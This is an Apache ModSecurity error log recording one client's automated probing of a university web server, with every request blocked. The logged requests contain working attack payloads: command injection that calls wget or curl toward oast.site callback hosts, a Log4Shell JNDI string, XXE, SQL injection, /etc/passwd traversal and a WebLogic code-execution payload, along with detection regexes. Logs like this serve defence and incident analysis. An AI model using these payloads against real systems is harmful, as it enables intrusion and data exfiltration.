[Tue Aug 29 11:31:24.635818 2023] [:error] [pid 1033] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:yrange. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:yrange: [33:system('wget http:/cjmn8l5jmimk2adbbnlgtxtbxshyy6ipj.oast.site')]"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/q"] [unique_id "ZO10nMCo-f0AAAQJWsgAAAAr"]
[Tue Aug 29 11:31:25.365601 2023] [:error] [pid 1037] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:pingIpAddr. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:pingIpAddr: ;curl http:/cjmn8l5jmimk2adbbnlgo6ozg1qfgbtnj.oast.site -H 'User-Agent: Ri3pKB'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/cgi-bin/system_log.cgi"] [unique_id "ZO10ncCo-f0AAAQNwFwAAAAv"]
[Tue Aug 29 11:31:26.713422 2023] [:error] [pid 1040] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:settings[view options][outputFunctionName]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:settings[view options][outputFunctionName]: x;process.mainModule.require('child_process').execSync('wget http:/cjmn8l5jmimk2adbbnlg8qp8wi58px63f.oast.site');s"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/page"] [unique_id "ZO10nsCo-f0AAAQQylAAAAAy"]
[Tue Aug 29 11:31:27.407108 2023] [:error] [pid 1018] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES:session_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES:session_id: ../../../opt/trendmicro/minorityreport/etc/igsa.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mbkm.unla.ac.id"] [uri "/cgi-bin/logoff.cgi"] [unique_id "ZO10n8Co-f0AAAP6NNgAAAAQ"]
[Tue Aug 29 11:31:27.625584 2023] [:error] [pid 1037] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:bsh.script. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:bsh.script: exec(cat/etc/passwd) "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mbkm.unla.ac.id"] [uri "/bsh.servlet.BshServlet"] [unique_id "ZO10n8Co-f0AAAQNwF8AAAAv"]
[Tue Aug 29 11:31:29.269044 2023] [:error] [pid 986] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:path: ../../../../../../../../../../../../etc/passwd\\x5c0"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/wp-content/plugins/admin-word-count-column/download-csv.php"] [unique_id "ZO10ocCo-f0AAAPahy0AAAAL"]
[Tue Aug 29 11:31:29.445495 2023] [:error] [pid 1036] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:opt. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:opt: (cat/etc/passwd)>dtoa.txt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mbkm.unla.ac.id"] [uri "/include/exportUser.php"] [unique_id "ZO10ocCo-f0AAAQMrrEAAAAu"]
[Tue Aug 29 11:31:29.453403 2023] [:error] [pid 1037] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'ARHJ'='ARHJ found within ARGS:id: 1' AND (SELECT 9687 FROM (SELECT(SLEEP(6)))pnac) AND 'ARHJ'='ARHJ"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/admin/suppliers/view_details.php"] [unique_id "ZO10ocCo-f0AAAQNwGYAAAAv"]
[Tue Aug 29 11:31:29.527940 2023] [:error] [pid 1037] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:nx_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ) --  found within ARGS:nx_id: sleep(6) -- x"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/"] [unique_id "ZO10ocCo-f0AAAQNwGgAAAAv"]
[Tue Aug 29 11:31:30.349314 2023] [:error] [pid 1029] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:uid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: extractvalue( found within ARGS:uid: 1 and extractvalue(1,concat_ws(1,1,md5(999999999)))"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/duomiphp/ajax.php"] [unique_id "ZO10osCo-f0AAAQFcS8AAAAn"]
[Tue Aug 29 11:31:31.384760 2023] [:error] [pid 1042] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:key: ';`wget http:/cjmn8l5jmimk2adbbnlgxkzzinu6f84oq.oast.site`;#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/cgi-bin/login.cgi"] [unique_id "ZO10o8Co-f0AAAQSWMwAAAA0"]
[Tue Aug 29 11:31:32.379059 2023] [:error] [pid 986] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:User. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:User:  cat/etc/passwd "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mbkm.unla.ac.id"] [uri "/cgi-bin/kerbynet"] [unique_id "ZO10pMCo-f0AAAPahz4AAAAL"]
[Tue Aug 29 11:31:33.439954 2023] [:error] [pid 894] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:username: admin' or '1'='1"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/admin/index.php"] [unique_id "ZO10pcCo-f0AAAN@5F8AAAAO"]
[Tue Aug 29 11:31:33.654152 2023] [:error] [pid 986] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:iface. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:iface: ;curl cjmn8l5jmimk2adbbnlg9estzqfj6443f.oast.site/`whoami`;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/ajax/networking/get_netcfg.php"] [unique_id "ZO10pcCo-f0AAAPah0YAAAAL"]
[Tue Aug 29 11:31:34.404058 2023] [:error] [pid 1033] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:param. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )--  found within ARGS:param: 1' and updatexml(1,concat(0x7e,(SELECT md5(999999999)),0x7e),1)-- "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/api/sms_check.php"] [unique_id "ZO10psCo-f0AAAQJWugAAAAr"]
[Tue Aug 29 11:31:35.396747 2023] [:error] [pid 894] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:pubid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:pubid: 4'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/ebook/bookPerPub.php"] [unique_id "ZO10p8Co-f0AAAN@5GoAAAAO"]
[Tue Aug 29 11:31:36.336725 2023] [:error] [pid 876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:host. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:host:  cat/etc/passwd "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mbkm.unla.ac.id"] [uri "/api/ping"] [unique_id "ZO10qMCo-f0AAANsATMAAAAD"]
[Tue Aug 29 11:31:36.364652 2023] [:error] [pid 1061] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:j_username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:j_username: ${jndi:ldap://${:-808}${:-319}.${hostName}.username.cjmn8l5jmimk2adbbnlgqjn1te1bxprnj.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/j_security_check"] [unique_id "ZO10qMCo-f0AAAQlGQ0AAAAF"]
[Tue Aug 29 11:31:37.355800 2023] [:error] [pid 876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  1=1 found within ARGS:username: dw1' or 1=1 #"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/zms/admin/index.php"] [unique_id "ZO10qcCo-f0AAANsATgAAAAD"]
[Tue Aug 29 11:31:37.408110 2023] [:error] [pid 894] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:discount_code. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ) --  found within ARGS:discount_code: '  union select sleep(6) -- g"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/"] [unique_id "ZO10qcCo-f0AAAN@5HQAAAAO"]
[Tue Aug 29 11:31:38.301163 2023] [:error] [pid 1061] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:ztd_password. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:ztd_password: $(/bin/wget$IFShttp:/cjmn8l5jmimk2adbbnlghaj9357eqo5xi.oast.site)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/Collector/nms/addModifyZTDProxy"] [unique_id "ZO10qsCo-f0AAAQlGRUAAAAF"]
[Tue Aug 29 11:31:38.555609 2023] [:error] [pid 994] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:day. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:day: 1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,(SELECT MD5(55555)),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/module/smartblog/archive"] [unique_id "ZO10qsCo-f0AAAPiBj0AAAAB"]
[Tue Aug 29 11:31:38.599926 2023] [:error] [pid 1060] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:username: ;`curl cjmn8l5jmimk2adbbnlgbiboxwk43wk7n.oast.site`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/login"] [unique_id "ZO10qsCo-f0AAAQkBW4AAAAC"]
[Tue Aug 29 11:31:39.372621 2023] [:error] [pid 1024] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:payload. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22 ?><! found within ARGS:payload: <?xml version=\\x221.0\\x22 ?><!DOCTYPE a [ <!ENTITY % xxe SYSTEM \\x22http://cjmn8l5jmimk2adbbnlgsudqdioy6mrcc.oast.site\\x22>%xxe;]>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/carbon/generic/save_artifact_ajaxprocessor.jsp"] [unique_id "ZO10q8Co-f0AAAQA-94AAAAi"]
[Tue Aug 29 11:31:40.395309 2023] [:error] [pid 1017] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "Multipart parsing error: Multipart: Final boundary missing."] [severity "CRITICAL"] [hostname "mbkm.unla.ac.id"] [uri "/Config/SaveUploadedHotspotLogoFile"] [unique_id "ZO10rMCo-f0AAAP5mJwAAAAM"]
[Tue Aug 29 11:31:41.537344 2023] [:error] [pid 986] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at REQUEST_COOKIES:wpsc_guest_login_auth. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within REQUEST_COOKIES:wpsc_guest_login_auth: {\\x22email\\x22:\\x22' AND (SELECT 42 FROM (SELECT(SLEEP(6)))NNTu)-- cLmu\\x22}"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/"] [unique_id "ZO10rcCo-f0AAAPah2IAAAAL"]
[Tue Aug 29 11:31:43.328889 2023] [:error] [pid 972] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:folder. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:folder: ../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/index.php"] [unique_id "ZO10r8Co-f0AAAPMmKIAAAAY"]
[Tue Aug 29 11:31:44.330259 2023] [:error] [pid 918] [client 143.42.78.27] ModSecurity: XML parser error: XML: Failed parsing document. [hostname "mbkm.unla.ac.id"] [uri "/soap.cgi"] [unique_id "ZO10sMCo-f0AAAOW38wAAAAg"]
[Tue Aug 29 11:31:44.330309 2023] [:error] [pid 918] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [hostname "mbkm.unla.ac.id"] [uri "/soap.cgi"] [unique_id "ZO10sMCo-f0AAAOW38wAAAAg"]
[Tue Aug 29 11:31:44.337647 2023] [:error] [pid 1063] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:handle. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  = ( found within ARGS:handle: com.tangosol.coherence.mvel2.sh.ShellSession(\\x22weblogic.work.ExecuteThread executeThread = (weblogic.work.ExecuteThread) Thread.currentThread();\\x0d\\x0aweblogic.work.WorkAdapter adapter = executeThread.getCurrentWork();\\x0d\\x0ajava.lang.reflect.Field field = adapter.getClass().getDeclaredField(\\x22connectionHandler\\x22);\\x0d\\x0afield.setAccessible(true);\\x0d\\x0aObject obj = field.get(adapter);\\x0d\\x0aweblogic.servlet.internal.ServletRequestImpl req = (weblog..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/console/css/%2e%2e%2fconsole.portal"] [unique_id "ZO10sMCo-f0AAAQnF38AAAAF"]
[Tue Aug 29 11:31:44.343937 2023] [:error] [pid 1042] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:progressfile. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../ found within ARGS:progressfile: ../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/wp-content/plugins/usc-e-shop/functions/progress-check.php"] [unique_id "ZO10sMCo-f0AAAQSWN0AAAA0"]
